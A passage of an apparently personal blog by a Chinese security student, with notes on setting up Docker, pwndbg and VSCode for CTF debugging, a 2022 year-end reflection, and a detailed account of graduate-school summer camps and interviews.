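Once docker run has created and started the container, the same command cannot be run a second time: it includes the container-creation step, and a container with that name already exists. To start the existing container again, use docker start -i <container>.

See docker run - 菜鸟教程 for more options.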

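Dockerfile format

If you want to write your own Dockerfile, you need to know its instructions.

I will just point to Dockerfile格式以及Dockerfile示例 - 阿里云开发者社区, which is very thorough, rather than repeat it here.

CTF debugging

CTF debugging comes down to two things: a debugger and an editor.

Start the Docker container first:

# Start the container. Without -i (interactive mode) it runs in the background
docker start <container>
# Start bash inside the running container
docker exec -i <container> /bin/bash

When bash starts this way it prints no prompt (no pseudo-terminal is allocated without -t), so type a command such as whoami to check that it worked.

Do not test with ls: the current directory may be empty, which would mislead you.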

Debugger setup

First the debugger. Just install pwndbg inside the container; there is no need to put the installation into the Dockerfile:

# We are already root here, so sudo is unnecessary
apt-get update
apt-get install git

cd ~
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

# Install pwntools
pip3 install pwntools

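Editor setup

VSCode is the first choice here. It has a rich set of Docker extensions for managing and working with containers.

Following VsCode在Docker中进行开发 - 知乎, install the Docker and Dev Containers extensions in VSCode.

Once they are installed, you can attach the host's VSCode directly to the Docker container: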

2022年年终总结

2023-01-04T16:00:00.000Z

2022 年年终总结

2021.11.29

在阅读论文的这段过程里，我慢慢对安全研究有了更深层次的体会。之前一个老师和我说，“挖洞不是安全研究，研究研究，研究的对象应该是一个有规律的东西，例如数学物理等”，当时的我尚未明白。直到现在，我们慢慢了解了，其实安全研究，本质上是研究某些东西或某些领域如何做的更好，达到更好的效果，例如 fuzz 出更好的覆盖率或者提出更好的防护手段。

而挖洞，与其说是研究，更不如说是在现有安全研究的成果之上，所进行的一种行为。例如 e9afl 基于 e9patch 这一个安全研究的产出，对闭源产品进行插桩 fuzz，完全达到开源代码插桩 fuzz 的效果。

这样看来，安全研究确实是有规律的，比如这周刚刚看完的 healer（一个 kernel fuzz）。

现有问题：生成的 syscall 序列覆盖率不够高
提出想法：尝试获取 syscall 之间的显式关系和（最重要的）隐式关系，以提高覆盖率
实现方法：分析 syzlang 获取显式关系，通过覆盖率反馈和覆盖率变化检测来获取隐式关系。

这样一条 提出问题->解决方法->实现过程的链就这么串起来了。

实际上，个人认为安全研究和挖洞应该是相互包容的关系，不可分割。企业中安全研究的这个职业，我们通常指的是挖洞选手。而要想挖出别人没挖到的二进制漏洞，那就必须深扎安全研究，将某个新颖想法从提出变成实现。而安全研究也常常需要**几十个 CVE或挖到了更难挖出的洞（或别人挖不出的洞）**来证明某个成果的成功性，现有的漏洞猎人也是站在当前安全研究的进度上进行漏洞挖掘，例如 Address Sanitizer 这个相当优秀的内存检测工具，在现在的二进制挖洞环境下，处处都有它的影子。而它也曾是通过安全研究所提出来的一种简单想法，并最终逐步发展成一个非常完备的工具。

我曾在读研深造和直接就业这二者间徘徊过，不过随着暑期玄武的这段经历以及后续我阅读论文慢慢产生的一点想法来看，我已经逐渐坚定了自己读研的方向，想再潜心搞搞三年安全研究，尤其是漏洞挖掘与防护。个人认为读研不能为了读研而读研，没有目的的读研其实没有什么意思，而且很容易荒废掉自己的时间。在确定了自己的目的与方向后，我相信未来的研究将会充满着乐趣，因为研究自己感兴趣的东西是真的很容易上瘾（兴趣驱动型）。

不过虽然我站在现在的角度上理这一整套想法，可能还是存在着较大的局限性，但是我还是想把这段话留在这里，也算作一个标志。在未来的某个阶段我再回头看看当时的想法，说不定又有什么全新的体会。

2022年终总结

第一次写年终总结，有点不知道咋写，搓手手，就按照流水账的形式想到啥写啥吧。

上面这段是我在2021年年底有感而发写下的内容，可能有些水话或者自己也说不太清楚道理的语句（笑），随便看看。当时的我也曾在就业和升学中徘徊，之前想升学主要是有保研名额，不升学白不升；后来也在腾讯实习期间动摇过是否就业也是种选择。2021年年底从腾讯回来后紧接着就是准备搞科研（大三上学期），当时搞科研也是稀里糊涂，纯粹是因为大家都搞了所以就跟着大流联系老师搞，因此大三上学期的校内科研精力其实没有太多激情，感觉自己也不知道在搞什么（老师可能也比较头疼怎么安排任务hhh）。但这段时间确确实实让我有了更进一步阅读论文的契机，让我开始慢慢习惯阅读论文。回想起大二寒假第一次实习时，单单精读一篇论文汇报就花了有半个月的时间，现在确实小有进展。

后来2021年11月底，我准备了半个月的文书，读了一些论文，申请了清华网研院的科研实习。当初也因为很多原因踌躇过，犹豫过，但最后还是一句“不试试怎么知道呢”，投递出了实习申请。那段时间为了一篇文书、一份简历找了很多老师同学等寻求修改意见，也读了心仪导师相关工作的几篇论文，写了笔记，只为能让邮件中*“对老师目前的研究有了进一步了解”*这句话尽可能的真实。不过幸好，结果是好的，我成功申请进入 NISL 参与实习。（这里需要感谢一下我的神仙导师）

2022年上半年的时间基本上都花在了课程任务与科研实习上。这半年时间过得还算惬意，上完课回来就帮帮学姐做做实验，要是空闲的话打打 CTF ，研究一手新技术，或者看看论文啥的，还在学姐的鼓励下在 NISL 公开学术沙龙中做了一次论文分享。不过令我感到惊讶的是，因为我博客一直都在维护，5月份时我收到了华为 HR 的实习邀请、清华 ucore 作者的邮件联络；9月份时收到了上交 GOSSIP 组的实习邀请，以及10月份Water Paddler国际CTF战队的邀约。这些都是我曾经从未经历过的，惊奇之余也激励着我继续向前。

下半年的时间主要聚焦在保研流程中。准备材料、投递夏令营、准备洛谷机试等等，具体细节不一一做表。保研的这几个月也是折腾了很久，最麻烦的就是填写每份材料并投递出去，同时也要多发邮件联系老师寻求机会。不过索性结果还算顺利，虽然机考炸了只吃了个低保分，但硕士排名位于15/20 还是成功保研去清华网研院攻读硕士。结果出来的那一刻心里古井无波，已经没有了悲喜，只是感慨保研终于结束了。女朋友也保研去了北航，和清华仅仅隔着一条街，硕士入学后买辆小电驴就可以经常快乐相见了。

这一年主要面对着对保研的迷茫与压力。接下来，当决定了未来三年的去向、决定了自己接下来的研究方向后，后面的旅途也变得不再迷茫。但压力也确实是有的，来自多个方向的压力推着我，让我如履薄冰，不敢停下。保研结束后我也感受到自己的精力不再像是前两年那么充沛，这之中可能有心态的变化，但我更觉得跟长期熬夜导致的身体条件有关。年轻人要多锻炼少熬夜，只叹自己虽知但不容易做到。

长风破浪会有时,直挂云帆济沧海。2023年是新的一年，希望自己可以在新的一年中将自己的科研工作做到更好，同时也挖到更多的洞，在安全这条路上走得更远。

共勉。

My 2022 Postgraduate Recommendation (保研) Journey as an Information Security Major

2022-11-13T16:00:00.000Z

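I. Introduction

This post records my experience applying for postgraduate recommendation (保研) in autumn 2022.

Out of respect for each school's confidentiality requirements, it was published some time after the recommendation application system closed.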

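II. Background

School: a bottom-tier 985 university
Major: Information Security
GPA: 3.79/4.00
Rank: 1/42
Awards: several university- and provincial-level awards and one minor national third prize; National Encouragement Scholarship, but no National Scholarship.
My major gets only one National Scholarship a year. It went to a different person every year, and every year I was the runner-up. The eternal pain of my undergraduate years T_T
Internships
- Sophomore winter break: static analysis R&D, locally in Changsha
- Sophomore summer break: Tencent Security Xuanwu Lab
Research experience: a research internship of more than half a year at Tsinghua's Institute for Network Sciences and Cyberspace (网研院) during my junior year. I mainly ran comparison experiments, wrote parts of a paper, and wrote code for another project.
Papers: third author on a paper under submission to USENIX Security 2023 (one of the four top international security conferences), from the Tsinghua internship.
Projects: no research project, but one productive fuzzer that found vulnerabilities in products from many well-known vendors and earned acknowledgements and fairly generous bounties.
Research interests: software and operating system security
Goal: an academic master's at a Hua Wu (华五) school or above.
Professional master's programs are out: I cannot afford tuition in the tens of thousands (the 8k a year for undergrad was hard enough; tens of thousands would mean selling everything).
Direct PhD programs are out: I have no plan for one yet, and going direct-PhD just to get into a better school is a decision that needs great caution.

Bold text marks what I consider the more important points.

Final destination: Institute for Network Sciences and Cyberspace, Tsinghua University.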

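III. Summer Camps

1. Overview

| School / department | Admitted to camp | Notes |
| --- | --- | --- |
| PKU Computer Science (北大计算机) | No | Submitted the materials a day late and missed the deadline (unbelievable) |
| PKU School of Software and Microelectronics (北大软微) | Yes | |
| PKU 信工 | No | Probably need to contact an advisor |
| Tsinghua Shenzhen (清华深圳研究院) | No | Probably need to contact an advisor |
| Tsinghua 网研院 | No | Direct-PhD applicants get priority; for the master's, probably too many applicants, and I was screened out on school title |
| Fudan Computer Science | Yes | Screens purely on school title and rank; campers get a T-shirt and a notebook |
| NUDT (国防科大) | / | Applied and then did not follow up |
| HIT Shenzhen (哈工深) | No | The bar felt unusually high this year |
| HUST Computer Science (华科计算机) | No | High bar |
| NJU Computer Science (南大计院) | Yes | Reportedly a huge open camp of about 1k people |
| NJU Software (南大软院) | Yes (withdrew) | Clashed with the NJU Computer Science schedule |
| RUC Information (人大信科) | Yes | Does not screen purely on title and rank; also weighs personal experience. Very interesting. |
| SJTU Software (上交软院) | Yes | |
| WHU Cyber Security (武大网安) | Yes | |
| USTC Cyber Security (中科大网安) | Yes | Reportedly a low bar for 985 students; a gift pack on admission (but you pay for it if you later skip the camp) |
| CAS Institute of Computing Technology (中科院计算所) | Yes | Admitted but withdrew from the interview |
| CAS Institute of Information Engineering (中科院信工所) | Partly (withdrew) | Admitted, but it seemed nobody was screened out; the materials needed a stamp while my school was on break, and I had already been admitted to some good schools, so I dropped it |

Summary:

I got into essentially all of the Hua Wu camps (RUC, NJU, Fudan, SJTU, USTC).
Of Tsinghua and PKU, only PKU 软微 let me in...

Still not good enough...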

2. 具体情况

整个夏令营高峰期差不多是两周左右，以下按面试时间排序。

a. 复旦计算机

入营

复旦入营是纯纯的卡 title 和 rank，只要 title 好 rank 够就直接放你进去，实习经历科研经历论文啥的在入营阶段是一点也不看。

入营的营员都会发一件文化衫和一个复旦的本子，比较友好。

不友好的是发的文化衫我穿不下（就不能先统计一下吗，捂脸）

复旦今年入 300 人，但是可能只招收 50 个左右，最大头的招生部分还是留在了预推免。

时间表

7.1 上午：复旦模拟面试
7.4 上午：复旦开幕式
7.5：上午复旦机试，下午复旦英语面试
7.6 上午：复旦专业面试

复旦大学的时间貌似一直都是这样摊的比较开，不过幸好它比较早开营，没怎么和其他学校撞上。

开幕式

复旦入营就会寄一件文化衫 + 本子。开幕式的时候要求全体营员身穿文化衫，一批一批集体合照，但问题是…

复旦没有统计身高啥的，发的文化衫是面向 175 cm 的，对我一个快到 190 的壮汉属实是不太能套的进（捂脸）
腾讯会议对同时打开的摄像头数量貌似有限制，有不少同学在开幕式要打开摄像头合照的时候，被腾讯会议拦截摄像头打开请求，要求再等一段时间再打开…（包括我）
合影的时候，有好几个同学的腾讯会议背景还是清华网研院的图片（清华网研院比复旦早开幕，估计是网研院那边有要求要换背景），合影时属实有点尴尬（笑）

机试

复旦的机试一直都和其他学校不太一样，2小时3道题，自己编测试样例然后测试，提交时把自己写的题解（包括解题思路、时间复杂度、自己编写的测试样例等等）和代码打包交上去。提供的 OJ 只能反馈是否 Compile Error 或者 Submit，其他的都无法反馈。

第一题我用的图拓扑排序，第二题要用单调栈+线段树，第三题有点类似与背包问题，应该要用 DP。当时只做出来了第一题，第二题卡太久时间结果愣是没做出来。

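English interview

The questions were tightly tied to my self-introduction. It seemed the interviewers had no application materials in front of them, which was odd. The panel was one professor and a senior student who looked like a graduate student; she asked all the questions and the professor asked none.

My self-introduction mentioned that I had helped write a paper, and every English question afterwards was about that (facepalm). For example:

Which part of the paper did you write
How did you write the Related Work section, and can you share your experience
The background of fuzzing

and so on. My answers were mediocre at best, and the template questions I had prepared were never used.

Technical interview

Five professors sat on the technical interview panel and each asked questions, mainly about my Tencent internship, the fuzzer, the 408 core subjects, the coding test and so on, again mostly following my self-introduction.

As an aside, it really looked like the interviewers had none of the candidates' materials, which felt strange.

For 408 they mainly asked about page faults in operating systems, the difference between HTTP and HTTPS, and when HTTPS is still open to man-in-the-middle attacks.

On the coding test they asked how to solve the second problem. This seems to be a mandatory question: some campers were asked about the third problem and some about the second. So even if you could not solve a problem during the test, ask someone right afterwards and learn how the remaining problems are solved.

The professors specifically asked whether I had a research project. My fuzzer does not really count as research, but it was all I could bring up. One professor asked whether the bugs it found had any proof; I said yes, I had received several CVE IDs and bounties. They also asked how it detects bugs, so I brought out AddressSanitizer and said a few words about it.

Overall I answered reasonably well.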

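Result

Rejected, without even a waiting-list spot. Thinking it over afterwards, there are a few possible reasons:

Heavy competition. I applied to Prof. ym's intelligent systems group, where roughly 2 of 15 academic master's applicants get in, and the group does not seem to keep a waiting list.
I did not contact an advisor. This is less likely, because some students who contacted professors right after admission were rejected too.
The wrong direction. My undergraduate work has all been around fuzzing, while that group mainly does software code analysis and apparently little fuzzing.

On reflection the third reason is the most likely: the professors did not seem very interested in my work, and at one point there was an awkward silence when nobody wanted to ask anything.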

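b. RUC School of Information

Camp admission

RUC School of Information was the first to open summer camp applications (deadline May 20), so it was flooded with applicants. Results were promised for mid-June, but mid-June came and went with nothing, and the notice at the top of the website was one titled "Wanglaoji Scholarship recommendation list". Many people in the Green Group (绿群) therefore jokingly call the school "Wanglaoji".

I watched the view count of that Wanglaoji notice climb from 200 to the current 8k+. Thoroughly flooded...

I had assumed that with so many applicants I would be filtered out at the materials stage, so getting in was a pleasant surprise. RUC apparently screens on the materials as a whole rather than on title + rank alone.

RUC is small but excellent. The campus is not large, but it sits in a prime location (Zhongguancun), so going there is a very good deal. (Its computer science has also been growing fast in recent years.)

Schedule

7.3 afternoon: RUC School of Information technical interview.

RUC also has a written test, which a CSP score can replace. A written test means a mock session too; I used my CSP score to skip both, otherwise they would have clashed with NJU's written test. A CSP score of 300 converts to fewer points this year than last, so I thought I had lost out, but this year's written test was reportedly much harder than last year's, so I actually came out ahead.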

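Technical interview

RUC's assessment is covered by a confidentiality rule, so I will not give details here, only my own experience. (RUC is very strict about keeping interview questions confidential: it is stressed before the interview and again afterwards.)

The English part was my worst ever: I stumbled, stalled every few seconds and squeezed out a few words at a time. I was nervous and simply could not answer. Because this part is relatively hard, it probably carries a relatively high weight (a guess).

The rest of the interview went smoothly and the professors do not give you a hard time. If you stop talking for half a second after an answer, they move straight to the next question without pressing further, which is very comfortable.

Advisor interview

On the evening after the interview, the professor who had interviewed me phoned and chatted briefly about related work (a very pleasant voice, and quite a big name). Because I have done a lot of fuzzing as an undergraduate, he hoped I would come to RUC. He was also frank that an advisor has limited influence on the interview and that it mostly depends on the candidate.

Result

My notes right after the interview:

One word: doomed! The English part was probably too weak, and the competition was heavy. Information security was nominally 2 out of 25, but the written test eliminated some, so only about 15 people were interviewed.

I just hope I am near the top of the waiting list, which should be enough to get in. Judging by previous years, RUC information security goes down to about seventh place on the waiting list.

RUC releases results quickly. Interviews are split over three days for direct PhD, academic master's and professional master's, and emails go out the day after each interview. For example, academic master's emails (if you get one) arrive on the day of the professional master's interviews.

Update: well, they actually gave me the outstanding-camper offer. There were 3 such offers for information security this year, and I was moved beyond words.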

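c. PKU Software and Microelectronics

Camp admission

This seems to be the first year that PKU Software and Microelectronics (SSM) has run a summer camp; before, it only had the pre-recommendation round, so many people guessed that something big was coming.

First you submit application materials and SSM filters out those that do not qualify. The remaining applicants pick a paper and write literature reading notes, which experts then use for a second round of screening. Only after passing all of this are you admitted to the camp. This year 212 people were admitted and only half can stay.

Papers are offered in five directions, and the direction of the paper you pick becomes your direction:

System software (ubiquitous operating systems, system software for the Internet of Data, etc.)
High-confidence software (software and system security, blockchain and privacy computing, etc.)
Domain intelligent software (big-data machine learning, distributed intelligent operations, etc.)
Domain intelligent software (multimodal knowledge computing, program analysis and understanding, etc.)
Domain intelligent software (intelligent computing and perception, etc.)

I ruled out the last three. I originally wanted a paper from direction 2, but its list put me off: half of it was machine learning and the rest included things like blockchain. I ended up choosing a direction 1 paper that combines taint analysis with a big-data engine for privacy protection.

The reading notes must be at least 1.5k characters, but many people with 2k characters were not admitted. From a quick count, those admitted (me included) had mostly written 4k or more.

I do not think this is over-competition; 2k characters are simply too few to describe what a paper says.

Schedule

7.10 morning: PKU SSM camp opening
7.10 afternoon: PKU SSM research group meet-and-greet
7.11-7.12: PKU SSM interviews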

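Camp opening

PKU SSM used to be job-oriented. People went there with employment in mind, because internships were allowed and many students could intern for a year or two, which was very comfortable. A magical text called "The SSM Bible" (《软微圣经》) even circulates in the Green Group...

But! Starting this year everything has changed. For recommended students, SSM now recruits for research. In other words, the professional master's students admitted this year are no longer ordinary engineering master's students but "frontier engineering" master's students: professional master's students recruited to do research, yet without a paper requirement, which looks a bit odd.

Half of the professors recruiting at SSM this year come from PKU's ECE school (信工), and many have labs at Yanyuan (the main PKU campus). For direction 1 (the only one I know about), 3 years at SSM = 1 year in Daxing + 1.5 years of research at Yanyuan + 0.5 year of internship.

The university does not provide housing for research at Yanyuan (the main campus cannot even house its own students...), so SSM students doing research there must rent on their own. The department's 2.5k subsidy plus the lab's research stipend should cover rent near Yanyuan (about 3k+), so it is actually a decent deal; even PKU EECS is out in remote Changping.

Very unusually, the SSM dean said there would be no pre-recommendation round this year; SSM will put every camper on the waiting list to avoid being left short when offers are declined.

That depends on the direction, though. Professors in some directions said they would not keep a waiting list: if everyone declines, so be it.
I suspect they also have quota at EECS and do not depend on these few SSM slots, hence the confidence.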

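Technical interview

You prepare a self-introduction PPT to show the professors what you can do. Prof. j, who interviewed me, was very kind, and the interview was relaxed and pleasant overall.

The English interview was a pure formality. The professor asked which other summer camps I had applied to. I said I had applied to Fudan's and been rejected, and to Tsinghua's and not even been admitted to the camp (facepalm).

But! The interviewer said my profile was too specialized (my undergraduate work was mainly software security, and it had produced vulnerabilities), while direction 1 is mainly system software. Prof. j was quite keen to take me, but he used to work on security and no longer does, so he referred me to a professor in direction 2.

The direction 2 professor never called (advisors phone to make an offer and confirm whether the student will come). On the evening of the day after the interview, Prof. j called me assuming the direction 2 professor had already been in touch; he had not, which was rather awkward (facepalm). I then emailed Prof. s in direction 2 myself and also asked a senior student to refer me, but heard nothing back. I figured SSM was lost.

Result

The call from direction 2 never came, so it really was over... Seeing rk1 and rk2 of the neighbouring computer science major land pkucs and thusz, I was truly envious.

When the outstanding-camper list came out I still wrote to Prof. j, asking him to consider me if anyone later declined.

A pity that I did not get pkuss as a safety net.

Aside

This year PKU Computer Science and the Shenzhen graduate schools used a weak committee system: if a professor wants you, you are in. I had heard somewhere that pku cs was strong committee, so I did not contact any advisor. A pity.

Although SSM recruits for research this year, some advisors there do not supervise closely, and with them you can probably still go off and intern as before.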

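d. SJTU School of Software

Camp admission

At SJTU School of Software I wanted to take a shot at the ipads lab. It is extremely strong in systems, arguably the strongest OS lab in the country. Prof. x is a very strong researcher, kind, and handsome too (grin). I emailed him at the end of April and received a standard reply.

What I did not expect was that he actually read my blog. Because it contains my notes on the uCore course (they are extremely detailed; probably nobody has more detailed uCore notes than I do), he forwarded the blog to one of uCore's authors, Prof. chyyuu of the Tsinghua Department of Computer Science, and then...

I was really touched. Later I had a phone chat with Prof. chyyuu about this area, which gave me more confidence for the summer camps. I am grateful to both professors.

Schedule

7.9 SJTU Software rehearsal
7.11 morning: SJTU Software camp opening; afternoon: SJTU Software coding test
7.12 morning: SJTU Software presentations
7.13 SJTU Software technical interview

Camp opening

On the morning of the opening I was rushing to a study room to attend it when I had an accident on my e-bike and hit someone. I spent the morning taking the injured person to hospital for a check-up and missed the opening entirely. Green Group members told me afterwards that ipads takes only about 5-7 recommended students. In 2021 it admitted these people:

but that list also includes exam-admitted and jointly trained students, so very few recommended students are actually admitted and the competition is fierce.

About 100 people were admitted to the SJTU Software camp, and 50+ of them applied to ipads from the start. You can imagine how fierce that is...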

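Coding test

The SJTU Software coding test is famous for its style: one very large simulation problem (the kind that takes 3 hours). This year's task was to implement a machine-learning decision tree by hand, with no GUI involved, so it was slightly easier. My strategy was flawed, though: I wrote almost all the code before starting to test, ran out of time, and tested only half of it. I do not know how that will be scored.

Before the test, SJTU Software hands out VPN accounts plus accounts and passwords for a remote virtual environment, and we configure the remote machine ourselves (IDE and so on). All coding during the test is done over a remote desktop connection, with screen recording running inside the remote desktop.

Remote machine specs: a Xeon CPU, 16 GB of RAM and 80 GB of disk, which is enough. I installed Visual Studio, VSCode, PyCharm and others and copied the C++ and Python documentation over. In the end I only used VS and never touched the documentation.

The remote environment had some problems:

Slow disk. The disk is an HDD, so any activity pushes disk utilization to 100%, and creating a folder can hang for a long time (some of the time). The first hello world build in VS took 10 s... It got better later: with VS opened in advance and fully loaded, there were no big problems.
Network. Network jitter has a huge effect on how usable the remote environment is. I heard that someone quit the test in anger because the remote desktop turned into a slideshow...

The test was scheduled for 15:00, but some campers could not connect to the VPN, so it was pushed back to about 16:30. That afternoon clashed with my SSM interview. I had planned to finish the SSM interview and join the SJTU test late, but the VPN incident happened to delay the test just enough for me to join on time. Equally by coincidence, I was the very last person SSM interviewed that day (unbelievable...).

The proctor of my online exam room had said the problems could only be released once everyone was in the room. After the SSM interview I urgently asked Green Group members for their proctors' phone numbers, called around to find the meeting ID of my exam room, and only then started the test. I was truly touched.

A coding test score below 60 disqualifies you from the later interview.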

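Technical interview

The ipads interview was the same as in previous years: read a paper, then answer questions on it. The flow is a PPT self-introduction, then questions on the paper, and finally the English part.

The interviewers were very kind and easy-going, but the questions were really tricky...

I first assumed the paper questions would test how well I knew the paper, so I read it twice beforehand and learned every point; I had nearly memorized the evaluation numbers. But the professors asked open-ended research questions about it, for example: where do you think a certain check should be done, in hardware or in software; or, the paper does something on a single CPU only, so how would you make it run in parallel on several CPUs. I do not know what others were asked, but all my questions were of this very open kind.

I really could not answer... I was speechless. Those questions cannot be answered off the cuff; they need time to think through. In the moment there was no way to pause and think, so I just said whatever came to mind, and that was that...

In the English part I was asked to introduce any project of mine in English, so I picked the paper I had tagged along on and talked about it briefly.

The professors put a lot of weight on coding ability. I said that of the fuzzer's 20k lines of code I had written about 12k.

The interview itself was relaxed and pleasant. It is capped strictly at 20 minutes, and the professors give hints when you are stuck. I can only blame myself for not being good enough... I console myself with having earned an "ipads interview experience card".

Result

Whatever the school, SJTU releases results at the end of August, unlike other universities, which usually release within a week or even three days of the interview. Direct PhD results come out earlier than master's results, roughly before mid-August, and seem to be easier to get (depending on the school).

It does not matter anyway. The interview went badly and my ranking should be far down, so I stopped caring once it was over.

Also, SJTU Software usually seems to give its slots first to students who are already interning in the group (a guess), so an outside student has an even lower chance of an academic master's slot.

And: e-bikes belong on the greenway. I paid dearly in compensation.

Sure enough, an email later put me sixth on the waiting list, which is about the same as a rejection.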

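e. WHU Cyber Science and Engineering

Camp admission

I applied to WHU Cyber Science and Engineering almost at random. I thought I would most likely not go there, but applied anyway for the interview practice.

Schedule

7.11 afternoon: camp opening (I missed it because of the SSM interview and the SJTU coding test)

7.12 technical interview (I was scheduled for the afternoon)

7.13 morning: camp closing

Interview

The interview order was drawn by lot, streamed live in a group video call. It was over quickly, and I landed in the afternoon session.

Interviews are very short, about seven or eight minutes per person. I was sixth in the afternoon, and my turn came about 35 minutes after interviews started... I was still setting up my equipment and made it just in time.

The setup was the strangest of all: the monitoring camera used Tencent Meeting (fine), but the interview itself used QQ video, which was a bit surreal (facepalm).

The questions centred on the third-author paper and the fuzzer, so they seem to go by papers and projects.

One question was: **Do you have any awards?** That is exactly my weak spot... My answer: I have nothing outstanding in competitions, only a few university-level and provincial awards (facepalm).

Result

Outstanding camper, but I gave it up: the USTC offer arrived before the final list was published, so I released the WHU offer quickly to leave the chance to the people behind me.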

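f. NJU Computer Science

Schedule

7.4 afternoon: NJU mock interview

7.7 afternoon: NJU written test

7.13-7.14 technical interview

Written test

NJU seems to have run a mass camp of around a thousand people this year, so the written test has to cut more than half. It is 81 questions in 1 hour (all multiple choice, single-answer and multi-answer); a multi-answer question scores nothing if you pick too many, too few or a wrong option. It covers data structures, predicting the output of code, networking, operating systems and Linux. The coverage is very broad and goes beyond 408, with odd questions such as how a Java lambda expression is represented in bytecode.

The test discriminates well and cut more than half of the people (2k down to 200 according to the grapevine). It feels like a filter for students with good luck and good fundamentals (facepalm)

Lab interview

Before the department interview, NJU asks you to sign up for interviews with individual labs, so I chose the only lab doing vulnerability discovery: SecLab.

Prof. m of SecLab is also very strong and has given talks at many universities (I was lucky enough to attend one during my Tsinghua internship; it was very interesting).

I did not meet Prof. m at the lab interview, but the students who interviewed me were very nice, and one PhD student had even been a contestant on The Brain (respect).

The conversation was a happy one, and then the department assessment sank me. I was speechless...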

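Technical interview

I passed the written test by luck, and then the interview turned out to be truly hardcore... I searched online and found hardly any write-ups of NJU interviews. I was interviewed on the second day, and from what Green Group members reported on the first day, NJU likes to ask about discrete mathematics and data structures. But the accident had worn me out over those two days and I had prepared nothing, so the interview was a write-off... Misfortunes never come singly (facepalm). All I could do was tell myself that fortune and misfortune depend on each other...

The interview went roughly like this:

No questions about projects, experience, research or the self-introduction; purely course knowledge.
On entering, the first question: in English, describe what problem Kruskal's algorithm solves, how it works, and what it costs
Hardcore, right? (facepalm) My answer was terrible.
All later questions were in Chinese: first discrete mathematics, then data structures, and finally one operating systems question and one open question.
NJU seems to care a lot about discrete mathematics, so revise it well. (I paid for not doing so.)
The open question was what I mainly do outside class. Me: I built a project, blah blah... I think that was a poor answer and probably not the kind they wanted.

This was my worst performance in any interview (worse than RUC). Still, although the interview was a complete failure, earlier write-ups suggest that many NJU offers get declined, so there may be some hope. I will check again later.

Result

Around 80th on the waiting list. I have given up hope entirely; it went that badly...

It seems that once you attend NJU's summer camp you can no longer take part in its pre-recommendation round, which makes it look even worse...

I heard that in past years NJU went down past 80 on the waiting list, but the pre-recommendation waiting list is merged with the summer camp one, so my effective position is probably even lower.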

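g. USTC Cyber Security

Camp admission

Admission comes with a big gift pack:

Technical interview

There are two rounds of 10 minutes each, and a PPT presentation is required. Only one of the two rounds has an English Q&A; both have the PPT presentation and a randomly drawn course question.

Result

Outstanding camper. This seems easy to get at USTC for students from 985 universities: in this first summer camp of the cyber security school, 100 of 136 campers received it.

After getting it you must contact a professor immediately and complete mutual selection before filling in the recommendation system, otherwise the offer is void.

My advice is to contact professors after you have the outstanding-camper status, since they may be more willing to talk to students who already hold it.

I had contacted a professor working on applied cryptography. He understood my situation and was willing to hold a slot for me until I had finished trying for Tsinghua and PKU, so having to turn him down later was hard and weighed on my conscience.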

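h. ICT, CAS

Camp admission

One day at lunch I suddenly got a call from a professor at the Institute of Computing Technology (ICT), CAS, inviting me to a short chat that evening.

I was quite surprised to be admitted. Personally I am not very interested in CAS institutes, because the atmosphere is so heavily research-focused; I would rather go to a more diverse university and have a richer graduate life (laugh).

Slightly embarrassing: I had completely forgotten which prospective advisor I had put on the ICT form and only remembered from the Tencent Meeting name during the short one-on-one interview... (I later found I was not the only one who had forgotten, laugh)

Short interview

Only after being added to a WeChat group did I learn that I was not the only interviewee. Each person got about 10 minutes on average.

The prospective advisor first asks for a self-introduction (he has no materials and no idea what your strengths are), so prepare it well.

He then asked about my internship and research experience, for example what the work was about; these were all easy to answer.

Finally he asked, "Have you ever debugged the Linux source code?" I said yes, I had debugged the Dirty Pipe vulnerability that came out early this year. He asked me to walk him through it, nodded repeatedly while I did, and remarked at the end that the explanation was clear.

The short interview was brief, relaxed and pleasant. The advisor said, however, that he only had professional master's slots and left it to me to decide whether to take part in his assessment.

Result

I bowed out after the short interview: I would rather study at a university, and a professional master's program did not meet my expectations.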

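3. Takeaways from the summer camps

For camp admission, title and rank are crucial, especially at schools that screen by brute-force title & rank; Fudan, I am looking at you. I once saw in the Green Group someone ranked 1st at a lower-tier 211 university, with several papers and several national awards, who was not admitted to Fudan Computer Science. It felt almost theatrical at the time...
Title is fixed by your gaokao score and cannot be changed, but rank can still be fought for, and it directly decides whether you get into a camp.
Be careful with ACM. Unless you can win an ACM gold medal, do not give up research and rank for it. ACM does help, and some schools are very fond of ACMers, but I think the return on that investment is lower than elsewhere. ACMers do earn extra goodwill in advisor interviews, so it depends on your situation.
Rank and title weigh heavily for camp admission, but in interviews and advisor interviews they matter least. What matters is research experience and output > project experience >= competition experience >= big-company internships >> rank. Advisors value research ability over rank. At some schools the department interview is also a formality and what really decides whether you stay is your materials, so these things matter a great deal. Pure-rank candidates must have a very solid grounding in the core courses; otherwise, outmatched on research and with no projects and no competitions, they have nothing to show. If you plan to go for recommendation, company internships can wait; put more of your energy into research internships.
If you are aiming for a strong group or a famous advisor, intern in the group early, for at least one semester. Interning early lets you claim a spot and get informally accepted early, and the summer camp then goes smoothly. Do not expect to win over big-name advisors by talk alone; they already have interns working in the group.
An internship is also a two-way selection: the advisor decides whether to take you, and you find out what the group's atmosphere is like, whether it is what you want, and how it differs from what you imagined.
Likewise, at schools where each lab runs its own assessment, not contacting the advisor in advance is a big handicap, because such labs take their interns first (SJTU ipads, for example). The fewer people a lab takes, the harder it is to get in without prior contact.
Think twice before turning down an advisor, especially advisors in the same field. I only approached five advisors during the summer camp season, but those five really do know each other, some are close friends, and almost every one of them asked me why I was not trying for Tsinghua... So be honest when you talk to an advisor: let them know you might not come, give them fair warning, and let them understand your constraints.
Of course opinions differ here, and some students turn advisors down more ruthlessly than others... For their own future that is not exactly wrong; it has to be weighed from both your own position and the advisor's. Think of your juniors as well: do not pave your own way at the expense of the next cohort from your school.

Summary: reaching out and interning in the group >> research experience and output > project experience >= competition experience >= big-company internships.
In practice, quite a few advisors asked about my Tencent internship during interviews.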

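IV. Pre-recommendation Round

The pre-recommendation round is harder than the summer camps! Overall, most schools (including the "middle nine") raise the bar: where rank 5% was enough for a summer camp, pre-recommendation may need 3%. Most of what it recruits is waiting-list material, and professors mostly take their summer campers. Fortunately a minor national third prize was announced before the round and my GPA went up by 0.01, so my position was slightly better.

Going into pre-recommendation I held academic master's offers from RUC School of Information and USTC (I had released WHU and did not enter it in the system). The RUC seclab professor's direction fits me well and RUC's location is excellent (inside Beijing's Fourth Ring Road), so apart from Tsinghua and PKU the RUC offer was about the best outcome for me, and I only took a light shot at the other Huawu schools in this round. A quick rundown of pre-recommendation at the Huawu schools:

RUC: the School of Information has no pre-recommendation round.
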